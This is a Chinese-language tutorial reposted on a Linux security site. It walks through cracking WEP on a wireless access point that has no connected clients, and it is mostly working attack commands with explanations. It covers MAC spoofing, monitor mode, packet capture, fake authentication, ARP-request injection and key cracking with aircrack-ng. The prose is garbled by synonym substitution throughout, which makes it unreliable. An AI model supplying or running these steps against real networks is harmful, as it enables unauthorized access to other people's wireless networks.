Ubuntu下无客户端无线WEP加密破解实战[Linux安全]
本文“Ubuntu下无客户端无线WEP加密破解实战[Linux安全]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
在图形界面中,翻开一个Shell,以下图,输入ifconfig -a 察看当前网卡
这里我就利用USB网卡为例,可以看到有一个名为rausb0的网卡,状况是未载入,这里先不要载入,先将MAC地址改正成需假造的肆意MAC地址,
输入macchanger –m 00:11:22:33:44:55 rausb0
-m后跟要假造的MAC,之后再跟要改正的网卡名便可,这里我们将该USB网卡MAC改正成00:11:22:33:44:55
然后再载入网卡,输入:
ifconfig -a rausb0 up来载入USB网卡驱动
下来,我们可以利用如Kismet、Airosnort等工具来扫描当前无线网络的AP,
然后,我们需求将网卡激活成monitor情势,才可以举行后续的破解,号令以下:
airmon-ng start rausb0 3,这里这个3就是我们发现的AP的频道,然后输入下列号令开始抓包
airodump-ng -w test.cap --channel 3 rausb0 ,这里test.cap就是我设置的抓包文件名
下来,便可以举行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动乃至不存在Client的情形下利用的.具体号令以下:
aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0
这里-1指的就是采取FakeAuth攻击情势,背面跟耽误;-e背面跟AP的ESSID,-a背面设置AP的MAC,-h背面则是前面假造的MAC,最后是无线网卡.
与此同时,为了IVs(初始化向量)的获得,必须举行ArpRequest注入式攻击,这个很重要,可以有效提高抓包数目及破解速度,号令以下
aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 rausb0
注释一下:-3指的是采纳ArpRequest注入攻击方法,-b背面跟上要入侵的AP的MAC地址,-h背面跟的是监测到的客户端MAC地址,这里我们利用方才假造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数目,这个值可以小一些,但最高1024便可以了,这里我利用默许,最后是指定USB无线网卡接下来,便可以同步开启 aircrack-ng来举行同步破解了,号令以下:
aircrack-ng -x -f 2 test-01.cap这里-x是暴力破解情势,-f指的是启用密码复杂度为2 ,背面是我们当即保存的那个抓包文件.
以上是“Ubuntu下无客户端无线WEP加密破解实战[Linux安全]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |